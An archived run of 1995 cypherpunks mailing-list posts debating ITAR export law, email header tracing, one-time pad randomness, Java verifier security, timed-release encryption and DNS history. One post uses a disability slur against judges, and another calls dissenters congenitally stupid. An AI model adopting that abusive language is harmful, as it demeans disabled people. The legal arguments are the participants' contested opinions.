Message-ID: <199511070400.XAA14905@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> One of the many problems in Perry's approach is that an international treaty
> is in essence a contract between governments.

Were that the case, citizens couldn't sue to have provisions impacting
them enforced, but the fact of the matter is that they can.

> Perry's somewhat offensive language is not a substitute for an argument.

Thank you for the ad hominem.

> I think I would take Perry's disbelief that a person is a lawyer becuse
> he disagrees with him as reflecting more on Perry than anyone else.

I'm not entirely sure that the international telecoms treaties cover
this, but both the gentleman I was conversing with and I appeared to
have assumed for purposes of discussion that they did. Given that, the
notion that international telecoms treaties are superceeded by the
ITARs does indeed give one pause to wonder.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 7 Nov 1995 22:38:58 +0800
To: tien@well.sf.ca.us (Lee Tien)
Subject: Re: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
Message-ID: <199511070404.XAA04542@homeport.org>
MIME-Version: 1.0
Content-Type: text


You need to send the entire headers, including such things as recieved
lines.  Looking over those lines carefully will probably provide some
clues.

eg:
>From owner-cypherpunks@toad.com  Sun Sep 24 20:14:32 1995
>Return-Path: owner-cypherpunks@toad.com
>Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
>homeport.org (8.6.9/8.6.9) with ESMTP id UAA18842 for
><adam@homeport.org>; Sun, 24 Sep 1995 20:14:30 -0400
>Received: from toad.com by relay3.UU.NET with SMTP 
>        id QQziqi14036; Sun, 24 Sep 1995 20:10:07 -0400
>Received: by toad.com id AA02191; Sun, 24 Sep 95 17:05:32 PDT
>Received: from crypto.com by toad.com id AA02182; Sun, 24 Sep 95
>17:05:26 PDT
>Received: from tpc.crypto.com by crypto.com Sun, 24 Sep 1995 20:16:16
>-0400
>Message-Id: <199509250016.UAA19204@crypto.com>


| So I got this message.  How would someone identify the sender of this
| message?  I'm writing an article on anonymity, with some discussion of
| remailers, and want to argue that forging already permits people to raise
| the costs of tracing significantly, anonymous remailers or no.  
| 
| Lee
| 
| >From: freeh@fbi.gov
| >Date: Tue, 24 Oct 95 16:07:08 -0400
| >Apparently-To: tien@well.sf.ca.us
| >X-UIDL: 814570964.056
| >
| >> How difficult is it to forge headers?  How difficult is it to trace a
| >> message to the actual sender if the header is forged?
| >
| >Not very difficult at all (to forge, that is).  This is a quick and dirty
| >example that should be somewhat traceable.  If you want pointers on how to
| >trace it, post the whole thing, including headers, to cypherpunks.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 14:06:55 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCewB-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511070405.XAA14913@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> 
> : I am starting to have trouble believing you are a lawyer. Are you
> : actually telling me that treaties which explicitly indemnify
> : transshipment customers against local laws are superceeded by lower
> : level laws, in spite of the supremecy clause of the constitution? That
> : might be what the state department would tell you, but I'd have
> : trouble believing even a lobotomized mongoloid judge would let that
> : stand. Treaties are treaties, period.
> 
> What I am telling you, if you would pay attention, is that there is no
> transhipment involved.  The violation of the ITAR consists of
> disclosing information, not shipment.

Given that it is a non-U.S. national disclosing information to a
non-U.S. national, both being outside the U.S.'s borders, with their
only involvement with the U.S. being an incidental traversal of their
communications via U.S. telecoms networks, I would say that it would
be a case where the telecoms treaties would come into play.

> If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
> to a German businessman there, that is literally a violation of the
> ITAR.

Where the hell did you get that idea?  The ITAR clearly does not apply
to foreigners disclosing things to each other outside the United
States. I've read it and I can't see how it could possibly be so
interpreted. I'm not a lawyer, but this interpretation is so bizarre
as to be almost untenable. I can clearly see that a U.S. person
talking about DES to a foreign person can be a violation under the
language in the regulations, but there is no way on earth to interpret
the regulations as applying to foreigners abroad talking to other
foreigners outside the U.S.

> Don't expect the ITAR to make any sense.  And don't think that you can
> apply logic to the ITAR and get logical results.  It doesn't work that
> way.

I was under the impression, though, that the words meant what they
said.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 7 Nov 1995 13:35:43 +0800
To: Alan.Pugh@internetMCI.COM (amp)
Subject: Re: using pgp to make an otp
In-Reply-To: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511070407.XAA04557@homeport.org>
MIME-Version: 1.0
Content-Type: text


amp wrote:

| my point here is that _if_ pgp output is random enough, i wouldn't need
| hardware. even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as imput for a stream cypher.

	PGP output is not random enough to be used for a one time pad.
The security of a OTP is *entirely* based on the quality of the random
numbers; they should come from some strong generator.  Building good
one time pads is tough, and usually not worth the effort.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Tue, 7 Nov 1995 22:12:37 +0800
To: cypherpunks@toad.com
Subject: it could be worse
Message-ID: <199511070410.XAA29659@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




 ``According to the former head of Romania's secret police, Ion Mihai
Pacepa, there had been ten million microphones in a country of twenty-three
million people.  That would mean that nearly everyone had been listened to
and then blackmailed into listening and reporting on others.  A maze of
psychic tunnels led from one person to another.'' [Andrei Codrescu, "The
Hole In The Flag", pp. 21-22]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 7 Nov 1995 15:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511070722.XAA05390@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

> > 4.2 Security in the Java Environment
> > 
> > Security commands a high premium in the growing use of the Internet
> > for products and services ranging from electronic distribution of
> > software and multimedia content, to "digital cash". The area of
> > security with which we're concerned here is how the Java compiler and
> > run-time system restrict application programmers from creating
> > subversive code.

[long list of important questions deleted ...]

Essentially, I think that all of this will distill to a single issue,
vis-a-vis Java or any other paradigm which wishes to represent itself as
*secure*.

Where is the security review role placed within the project development
life cycle?? 

Is it at Design Concept?  Or during Application Development?  Or is it
done last, after design completion, after all of the programming is
complete and the production people are involved in operational turnover. 

Or is it done at all?

This concept is not new, and should not present any problems to anyone in
the industry.  Even John Q. Public will understand it, if we use a simple
construction analogy. 

If you want to build a secure house, your security doesn't start AFTER the
house is built.  It has to start at a very early stage.  It starts before
the blueprints are made, when you specify that you want a concrete
windowless box located on a quiet street at the end of a cul-de-sac.  

That is simple and obvious. 

You certainly don't have *security* if after building a glass house on
Main Street, if after the design is finished, the footings have been
poured, and the key is about to be turned over to the occupant; if then,
as an afterthought you put a single strong deadbolt on the front door to
"secure" it. 

Anyone who can't or won't quite grasp this idea is either willfully
attempting to steer gullible individuals astray, or is congenitally
stupid. 

It's time to call a spade a spade. 

> What exactly does this mean?
> 
> > While all this checking appears excruciatingly detailed, by the time
> > the byte code verifier has done its work, the Java interpreter can
> > proceed knowing that the code will run securely. Knowing these
> > properties makes the Java interpreter much faster, because it doesn't
> > have to check anything. 

Yikes!!  I'll leave this for someone else to address.  This sounds to me
like a variation on virus scanning.  I think that there are far more
reputable virus experts than I who can comment and expand on *flaws* with 
that approach. 

> No runtime checking whatsoever.  Get past the supposed verifier, and you
> have free run of the machine.  A single verifier bug or inadequacy, and
> the world is unsafe for electronic commerce. 

As someone who *vividly* remembers October, 1987 and the near economic
meltdown which was BARELY averted by the Fed, a near meltdown which
occurred because of the interactions of systems far less intelligent or
complex than those we routinely utilize today, systems which directly
interface not only to each other, but have undocumented, non-predictable
interactions with "soft and wet" systems, I might have some serious
concerns. 

Then again, it is _only_ the economy, isn't it? 

> ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.
> 
> P.S.
> 
> When: Tuesday, November 7, 8AM
> Where: The Hilton, Washington D.C. (the CSI conference)
> The talk: 50 Ways to Attack Your World Wide Web Systems
> 
> If you want a chance to heckle - be there.

Drat ... I don't think that I'll be able to attend.  I've already got
a local presentation that I've pencilled in for tomorrow morning at
some god awfully early hour.  Then again, D.C. isn't quite my circuit.

I was hoping though for some clarification.  Are you THE Dr. Frederick
B. Cohen??  The one who originally coined the phrase "computer virus"
and who maintains the computer virus FAQ?

Are you THAT Dr. Frederick B. Cohen, and are you speaking publically
in Washington, tommorow as one of the keynote speakers?

If you are, I'd be interested as to whether you'll talk about the
recent gaping security hole in the existing installed Navigator code
base which I detailed to this list's subscribers. 

The one posted this last Friday the Thirteenth, that questioned
Netscape's wisdom in creating an experimental MIME object which does
not follow the usual HTTP request/response paradigm, but instead
allows a server to open and maintain a bi-directional communications
channel from server to client.

Effectively a non-password protected telnet into the heart of any
system, a open exploitable connection which penetrates proxy servers
and firewalls, and acts as an enhanced bi-directional
delivery/recovery mechanism?

I'd be very interested in the comments around that, especially since both
Netscape and AT&T (who distributes the softwre under its own brand name) 
have made an explicit "no comment".

I'd especially be interested in any post-session transcript. 

I also think that Elaine Garzarelli might be interested.  Especially since
she'll be addressing the nation and the public via the public television
airwaves this Friday evening. 

Or at least ... uhmmm ... I _think_ that's when her electronic daytimer
has her pencilled in ...




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 7 Nov 1995 14:59:04 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: consumer products that make nice sources
In-Reply-To: <acc00caf110210040ee2@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951106233235.10925A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Timothy C. May wrote:


> 
> I'd say they make poor sources. Far too large. A smaller source has better
> access to the detector without adding much to the overall background the
> user is exposed to. (I'm not saying low-level uranium or thorium sources
> are much of a hazard, but the fluence presented at the detector is very low
> for such an extended source.)
> 
> It depends on the detector type (alpha, beta, gamma, neutrino?), but high
> count rates can be obtained in a variety of ways. (Don't get too high a
> count rate, or the dead time characteristics of the pulse-height analyzers
> will introduce spurious correlations that decrease entropy--I mention this
> to show that even radiation detector sources of entropy have non-random
> issues to take into account.)


Gotta watch yourself around the physicist....

Most of the sources I mentioned are fairly anemic, however the Coleman 
lantern mantles are pretty good beta emitters.  I can get count rates 
approaching 1000 cpm on a tired GM tube detector with a beta window of 
unknown thickness.

Brad D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:26:41 +0800
To: cypherpunks@toad.com
Subject: Timed-release crypto and information economics
Message-ID: <47m82v$4p4@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

1. Method

In 1993, Timothy C. May posted a message to this list
<URL:http://www.hks.net/cpunks/cpunks-0/1460.html> with some thoughts on
time-release crypto.  I think his system is too complex.  Here I present
a cleaner model, and show how it can be used in several real-life ways.

In the May proposal, when you have a message to be encrypted, you
encrypt it with a session key, optionally split that key with an n-of-m
scheme, and then send the key into a network of escrow agents, which are
instructed to hold the message for a given period of time.  You then
hold onto the encrypted message, though you need not keep it secret.
Conceptually, you have encrypted a message and then remailed the key to
yourself in such a way that it will take X length of time to arrive.

I have a simpler, public-key plan.  When you want to keep a message
secret until date X, you ask your favorite crypto house to generate a
key pair and hold the secret key until date X.  You then encrypt your
message with the public key, and again hold onto the encrypted message.
N-of-m trust management can be implemented by secret-sharing your message
and encrypting each with a key generated by a different crypto house.

This method is clean, fully anonymous, and nearly stateless.

2. Economics

I've worked out a payment model for both the public and secret key, which
I think can be used for any sort of information in an information economy
not based on (increasingly unenforceable) intellectual property laws.

In this model, the creator of information charges enough to recover
his costs (call this price, the price available to the first buyers,
the "primary cost").  It is then possible for resellers to purchase
it and try to make a profit through multiple sales at a lower price.
If the reseller is hoarding the information, another one can step in,
pay the same initial rate, and try to do better.

This model seperates marketing of information from producing it, and gives
an easy way to profit from doing either.  Of course, it's possible to
conflate them into a information creator that sells directly to end-users.

Once you abstract this you'll notice that (a) it's much like existing
models for those who create information for hire, such as writers and
programmers who sign over copyright but could recreate the work; and
(b) it can be applied to many less extreme scenarios, such as where the
reseller makes the product available but under a restrictive licence.
I think this is the basic fabric of an information economy.

Applying it to the selling of timed-release pairs, the primary cost
of the public key is some nominal charge, and the primary cost of the
secret key is the amount required to judge whether or not it should be
released -- a trivial amount for time-based release but something more
for event-based release.  (A corollary is that you might pay the judging
fee for a secret key, and receive instead a certificate saying that it
cannot yet be released.)

3. Applications

* Bonds: You deliver $1000 in ecash to the issuer.  In returns it gives
  you a unique certificate redeemable for $1100, encrypted such that
  it may not be decrypted until the maturity date.  You also get a
  certificate saying that your encrypted bond is a bond, so that you
  may demonstrate fraud if you find something else once you decrypt
  it at maturity.  Essentially this is the same as creating a private
  corporate ecash bank.  Coupon bonds are a trivial extension.

* Retirement plans, cryonics funds, and wills: You encrypt your assets
  or your will in a custom event-based key, and archive it with your
  executor.

* Idea futures: You have a pair of key pairs generated, one for
  encrypting YES coupons, and the other for NO coupons.  Now anyone
  can generate and sell their own coupons, consisting of $1 in ecash
  encrypted with a YES or NO event-release key, again with a certificate
  of authenticity to verify fraud.

* Bonding: You pay $1001 for a reputable institution to give you a $1000
  bond encrypted in the event-release key based on your breech of
  contract, and its complementary negative key, and send you and the
  other party each one bond.  If you default on your contract, the
  injured party can ask the crypto house to release the default key;
  if you do not, you can ask the crypto house to release the other key.

4. Cypherpunks write code

I'll let everyone tear into this for a few days, and then I'll put up a
server for timed-release key generation, charging maybe c$1.  I'd like
to then enhance it to be capable of issuing bonds and loans denominated
in c$.  (I like the cyberbucks trial because it's officially play money,
so there aren't any regulatory burdens.)  This should be interesting.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6jgeyjYMb1RsVfAQHKPAP8CF8HAN3dPa0QaJ3knDuv5gKd2yIUE57G
icK5flsVOHcmq2+y3LkB8uCWBT1IxyoWv9I2u1yQbujYtttjgparCoCeErXk7uPe
h7yY/eZzx3wgIrGxMEGePZftwoA2aGfyO+wDy/5lPZ0yWxLpoLr67RfpWbutqinf
bmn6xeL64lg=
=iXOF
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 7 Nov 1995 15:11:29 +0800
To: owner-cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511070647.AA00471@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Originally DNS was just a handy user-friendly thing, but then
>it because the primary way to name a host.  This allowed the IP address
>to become irrelevant, which allows entire sites to be renumbered when the
>network topology changes.  This is important to keep the routing tables
>small (by minimizing the backwards-compatibility exceptions), which is
>a critical problem today.  Thus all recent architectural decisions have
>been away from direct use of IP addresses anywhere.

Hunh?

The Arpanet always used hostnames.  Just about the only time you
needed to specify a raw network address was when you were dialed into
a TAC and you did things like "@o 137" to connect to mit-mc.

DNS was created because the hosts.txt file, a single network-wide
file that listed the name, address, aliases, system type, etc., of
every host in the Arpanet got to be unmaintainable.

Routing is totally unrelated to DNS, based as it is in IP addresses.
Routers know nothing about DNS.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 7 Nov 1995 15:33:17 +0800
To: owner-cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <9511070710.AA00528@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Strangely
>enough this would seem to hurt, not help, the NSA in the most important
>part of their current mission, which is to help protect US industry
>against industrial espionage and virtual terrorism, which is a far more
>pressing threat. 

Matt's NATO adventures, for example, are an interesting example of what
happens when the two missions -- "protect our secrets" and "read theirs"
-- come into conflict.  (Not unlike the US Dept of Agriculture.)  Their
open involvement in places like W3C, where Agency staff talk about getting
Fortezza cards in COTS products provide another datapoint.

Budgets cuts may turn out to be strong crypto's best friend.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Tue, 7 Nov 1995 17:13:04 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <v01510103acc4ce7ca31a@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>> > While all this checking appears excruciatingly detailed, by the time
>> > the byte code verifier has done its work, the Java interpreter can
>> > proceed knowing that the code will run securely. Knowing these
>> > properties makes the Java interpreter much faster, because it doesn't
>> > have to check anything.
>
>Yikes!!  I'll leave this for someone else to address.  This sounds to me
>like a variation on virus scanning.  I think that there are far more
>reputable virus experts than I who can comment and expand on *flaws* with
>that approach.

This "checking," as any comp-sci undergrad will tell you, amounts to solving
the halting problem for the java interpreter. While this is possible for a
finite state automata like the java interpreter (made more difficult by the
fact that it can use the "net" for additional state), it is not even
remotely feasable.

If you can write a checker that works in a reasonable amount of time, I'll
write a turing machine simulator that'll do something nasty if the input
machine halts. Then we'll split the fame and fortune for solving the 5 state
Busy Beaver problem. Deal?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMJ8gtXIf3YegbdiBAQGqMQJXWzwuPYM2bNb96Fgfb1wGeDC83fNFOW5H
8PQHbnt8bDFsHxKv2L8kcBhtO/TWA0cugVYR9YFf2BOaGoA2UIoCBdwfABM1HAKU
hd0H
=TA2E
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 14:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
In-Reply-To: <199511070141.UAA15583@maple.sover.net>
Message-ID: <47moi5$ahc@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511070141.UAA15583@maple.sover.net>,
Stephen Whitaker <whitaker@sover.net> wrote:
> What constitutes a basic toolkit for trace route, sniff for promiscuous
> mode, all the other tools to map whats happening to net traffic in a little
> state of 1/2 million people? What are the sources of traffic information?

It won't help, because tapping wouldn't be done at the BGP4 level,
but at the switch (if with telco cooperation) or directly on the lines.
*You need end-to-end encryption*.  You need Kerberos or IPSEC.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 21:25:25 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070405.XAA14913@jekyll.piermont.com>
Message-ID: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: "Peter D. Junger" writes:
: 
: > If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
: > to a German businessman there, that is literally a violation of the
: > ITAR.
: 
: Where the hell did you get that idea?  

>From Section 120.17 of the ITAR which provides:

 _Export_ means:

 . . . .

 (4) Disclosing (including oral or visual disclosure) or transfering
 technical data to a foreign person, whether in the United States or
 abroad . . . .

(And technical data is (baroquely) defined in Section 120.10 as
including certain software, including crytographic software.)

: The ITAR clearly does not apply
: to foreigners disclosing things to each other outside the United
: States. 

Where the hell did you get that idea?  

: I've read it and I can't see how it could possibly be so
: interpreted. I'm not a lawyer, but this interpretation is so bizarre
: as to be almost untenable. I can clearly see that a U.S. person
: talking about DES to a foreign person can be a violation under the
: language in the regulations, but there is no way on earth to interpret
: the regulations as applying to foreigners abroad talking to other
: foreigners outside the U.S.

Go read the section that I quoted again.  Where is there an exception
for foreign persons who happen to be abroad?  

: > Don't expect the ITAR to make any sense.  And don't think that you can
: > apply logic to the ITAR and get logical results.  It doesn't work that
: > way.

: I was under the impression, though, that the words meant what they
: said.

When did you change your mind?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 21:19:20 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SOL.3.91.951106202632.8543C-100000@chivalry>
Message-ID: <m0tCnq6-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

: On Mon, 6 Nov 1995, Peter D. Junger wrote:
: 
: > 
: > Don't blame this on my being a lawyer; blame it on some very sick
: > people in the Office of Defense Trade Controls and in the NSA.
: 
: I think it's unfair to call the people at the ODTC and the NSA sick; 
: during the cold war, such restrictions did make some sense; in 
: particular, controlling the export of high-performance encryption 
: hardware does make it harder for other countries to deploy ubiquitous 
: strong encryption, particularly in the less developed countries, and 
: particulalry for chips that required exotic fabrication (the soviet union 
: never had really good mass-production facilities). 

The ones I was suggesting are sick are the ones who drafted the
definition of ``export'' and of ``technical data'' in the ITAR.  Would
you consider it more appropriate if I called them perverse?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 7 Nov 1995 22:29:12 +0800
To: tcmay@got.net
Subject: Re: toolkits?
Message-ID: <9511071418.AA25542@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May wrote:
>
> At 12:41 AM 11/7/95, Stephen Whitaker wrote:
> 
> >just might have a prayer of doing it right, whatever that is. What would it
> >look like if secure communications and anonomynity were designed in from the
> >start? Is this what Sameer is doing in Bezerkeley?
> >
> >What machines are considered minimum requirements to use these tools? What
> >are the essential reference works?
> 
> "Security and anonymity" are not matters for government to ensure.
> 
[...]
> I urge you, Stephen, to read up on encryption and the benefits contained
> therein. Looking to your state capital to secure your communications is a
> lose.
> 
 
Tim - I think your libertarian side is showing here....
Not that this is a bad thing, but I think there are some things 
that state governments can and/or should do.

First off - avoid trying to legislate minute details of any encryption
or signature scheme.  Bureaucrats trying to understand, much less control
technical things is doomed to fail.  (take GOSIP as a prime example)

Second - push for legal acceptance of digital signatures and
acceptance of privacy through encryption.  I believe Utah has taken a strong 
step in this direction.  Most people, businesses, and courts won't accept
digital contracts and the like until there is more of a sound
set of laws behind them.  Strong laws against government snooping or
against anti-encryption or anti-anonymous laws are a good thing IMO.
Besides - laws like that will let the bureaucrats drown themselves
in their own paperwork making sure then follow their own rules - and keep 
them out of our hair. ;-)

Third - provide services to the citizenry.  For example - provide
a public key server.  Or how about a digital time-stamping service.
If the crap was kept out of these services, and they were free for
anyone to use, then it would advance the idea of encouraging people to
use crypto in their daily lives.

Warning - Although I think there are some good things that governments
can do, it is also very important to watch out for "sabotage" by 
the government.  Governments tend to like control too much and by
trying to maintain control, reverse a useful service to one that
is a dis-service to the people.  In general, if governments get
out of the way, people will take care of problems themselves.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 17:26:29 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511070647.AA00471@sulphur.osf.org>
Message-ID: <47n7m0$i3k@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9511070647.AA00471@sulphur.osf.org>,
Rich Salz <rsalz@osf.org> wrote:
> >Originally DNS was just a handy user-friendly thing, but then
[...]
> Hunh?
> 
> The Arpanet always used hostnames.

Sorry.  But still, then intent was to be user-friendly (right?), and
a side effect was to make it possible to renumber without anyone noticing.

Renumbering didn't affect the health of the net until recently, with
CIDR, where blocks of IP addresses could be aggregated arbitrarily.
A provider might now get 10.11.12/22 (i.e., a 22-bit-long prefix), and
then assign customers 10.11.12/24, 10.11.13/23, &c., with only one entry
in the backbone routing tables.  To make this work you have to renumber
when you change providers.  Fortunately, we have DNS to provide a name
more stable than the IP address.

That's the connection between DNS and routing, and it's why using names
instead of numbers is Good.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 23:07:20 +0800
To: Cypherpunks <ohuf@relay.sedat.de>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <m0tCpU8-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Oliver Huf writes:

: 
: 
: On Tue, 7 Nov 1995, Peter D. Junger wrote:
: 
: > >From Section 120.17 of the ITAR which provides:
: > 
: >  _Export_ means:
: >  . . . .
: >  (4) Disclosing (including oral or visual disclosure) or transfering
: >  technical data to a foreign person, whether in the United States or
: >  abroad . . . .
: 
: The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
: or persons in the U.S.!

Go tell that to General Noriega.  I don't know what definition you are
talking about, but it is not one recognized by the American Courts.

: I think it's a common mistake of many Americans that they believe
: creating law means creating law for the whole world!

: > Go read the section that I quoted again.  Where is there an exception
: > for foreign persons who happen to be abroad?  
 
: It's inherent. You simply can't apply US-law to non-US-citizens outside
: the U.S.!  

The American courts will apply American laws to non-US-citizens who
violate American laws outside the United States, if they can catch
them.  The fact that they may be in the United States because they
were kidnapped or because they were captured outside the United States
in an agressive war that quite clearly violated international law
won't stop them for a moment.  And lord help the foreigner who has 
violated US law outside the US and then tries to immigrate to the
United States.

And the United States is not alone in this.  Look what Israel did to
Eichman.

And didn't Denmark just allow Germany to extradite an American citizen
for nasty things that he wrote and said in the United States?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 7 Nov 1995 23:46:19 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107102406.21752D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am delighted to discover that there is a person in this world who reads 
the ITAR more broadly than I do.  I can see how the ITAR could be read to 
reach a Frenchman who sends crypto via email to a German that happens, 
through no fault of his own, to be routed via New York; we might have to 
talk about whether the scienter requirment would mean that M. Frenchman 
knew or should have known about the routing.  [NB "could be read" does 
not equal "should be read".]

Not even I, however, would imagine that any court anywhere, could read 
the ITAR or the legislation authorizing it (which is more to the point) 
as reaching two foreigners talking abroad, neither of whom is a US person.

Not only does the US lack the jursidction to make such a rule, it has 
never sought to make such a rule in any context I am aware of (no, 
foreign wars don't count).  Not even in anti-trust or securities, 
where the extraterritorial jurisdictional assertions are premised on the 
effects of the foreign act to the US market...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 18:42:27 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <acc4182012021004674b@[205.199.118.202]>
Message-ID: <47ncgr$ji6@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <acc4182012021004674b@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> This seems to be saying the same thing. In both cases, "Alice" is either
> distributing a message to"Bob," "Charles," "Donna," etc., with instructions
